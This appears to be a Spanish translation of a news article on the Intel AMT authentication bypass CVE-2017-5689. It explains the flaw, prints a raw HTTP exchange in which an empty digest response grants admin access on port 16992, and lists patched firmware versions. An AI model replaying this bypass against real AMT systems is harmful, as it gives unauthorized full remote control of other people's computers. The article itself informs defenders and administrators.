La vulnerabilidad en Intel AMT resultó ser más grave de lo que pensaban



El 1 de mayo de 2017, Intel anunció una vulnerabilidad crítica en Active Management Technology (AMT) (vulnerabilidad INTEL-SA-00075, también conocida como CVE-2017-5689 ). La vulnerabilidad fue encontrada por Maxim Malyutin de Embedi, pero la mantuvo en secreto a pedido de Intel hasta el anuncio oficial.

Intel AMT es una tecnología de hardware que proporciona acceso remoto y fuera de banda (a través de un canal TCP / IP auxiliar independiente) para administrar la configuración y la seguridad de la computadora, independientemente del estado de alimentación (encendido / apagado de la computadora remota) y el estado del sistema operativo. La tecnología está integrada en el chipset. Si lo usa como un anti-rootkit para escanear RAM y unidades de PC, entonces no hay forma de eludir dicha protección. Peor aún, las solicitudes AMT remotas no se registran.

Ahora la solicitud de Shodan es emitida por más de 8500 sistemas con puertos AMT abiertos. Para algunos firmware de BIOS, todavía no se han lanzado parches que solucionen el error en AMT.

La tecnología AMT permite a los administradores del sistema realizar varias acciones en el sistema de forma remota: apagar las computadoras, cambiar el código del cargador de arranque, controlar los dispositivos de entrada, los programas ejecutables, etc. De hecho, AMT le permite realizar de forma remota todas las acciones que puede hacer, Tener acceso físico a la PC.

Después de leer la descripción de la tecnología, puede comenzar a fantasear con las oportunidades que tiene un hacker al tener acceso remoto a una computadora apagada con tecnología AMT. Entonces, tus fantasías resultaron ser ciertas . El acceso remoto a AMT se proporciona a través de una interfaz web en un navegador. Como Maxim descubrió, cualquier hash criptográfico o ninguno es adecuado para la autenticación de resumen de acceso . Es decir, el campo correspondiente en el formulario de autorización generalmente se puede dejar en blanco.

Ni siquiera parece una puerta trasera, porque ¿quién lo implementará de una manera tan torpe?

Sistemas vulnerables después del lanzamiento 2010-2011 (lista de firmware vulnerable, ver más abajo). Esto no es 100% RCE, sino más bien una vulnerabilidad lógica. Maxim Malyutin cree que hay varios vectores de ataque, cómo un atacante podría aprovechar esta vulnerabilidad, posiblemente incluso en sistemas Intel sin soporte de Intel AMT.

"La autenticación todavía funciona " , explicó Malyutin. "Acabamos de encontrar una forma de evitarlo".

A través de un navegador web, puede obtener acceso completo a las funciones de AMT, como si reconociera la contraseña de administrador en el sistema. Aquí le mostramos cómo hacerlo utilizando el proxy local en 127.0.0.1:16992:

GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth" Content-Type: text/html Server: AMT Content-Length: 678 Connection: close GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="60513ab58858482c" HTTP/1.1 200 OK Date: Thu, 4 May 2017 16:09:17 GMT Server: AMT Content-Type: text/html Transfer-Encoding: chunked Cache-Control: no cache Expires: Thu, 26 Oct 1995 00:00:00 GMT 04E6 

Pocos días después de la divulgación de información, Tenact lanzó un exploit para explotar una vulnerabilidad crítica con un aumento de los privilegios de AMT. La compañía sugirió usar esta herramienta para detectar sistemas vulnerables en su red. Para que los administradores del sistema sepan dónde instalar nuevas versiones de firmware. El exploit se implementa como un complemento de Nessus .

En los mismos días, los mayores fabricantes de servidores y computadoras personales emitieron mensajes oficiales de seguridad para sus clientes: un mensaje de HP , de Dell , de Lenovo , de Fujitsu . Habrá información detallada sobre firmware vulnerable y los enlaces a versiones actualizadas aparecerán tan pronto como estén disponibles.

Lista de firmware parcheado de Intel
Versiones vulnerables
firmware
Relevante
Generación de CPU
Parcheado
firmware
6.0.xx.xxxx

1er Gen Core

6.2.61.3535

6.1.xx.xxxx

6.2.61.3535

6.2.xx.xxxx

6.2.61.3535

7.0.xx.xxxx

Gen Core

7.1.91.3272

7.1.xx.xxxx

7.1.91.3272

8.0.xx.xxxx

3er Gen Core

8.1.71.3608

8.1.xx.xxxx

8.1.71.3608

9.0.xx.xxxx

4to Gen Core



9.1.41.3024

9.1.xx.xxxx

9.1.41.3024

9.5.xx.xxxx

9.5.61.3012

10.0.xx.xxxx

5º Gen Core

10.0.55.3000

11.0.xx.xxxx

6th Gen Core

11.0.25.3001

11.0.22.3001

11.0.18.3003

11.5.xx.xxxx

Séptimo Gen Core

11.6.27.3264

11.6.xx.xxxx

11.6.27.3264

11.6.12.3202

Intel ha lanzado una herramienta oficial para verificar las vulnerabilidades del sistema en Windows 7/10, así como una guía para su uso.

Source: https://habr.com/ru/post/es403713/


All Articles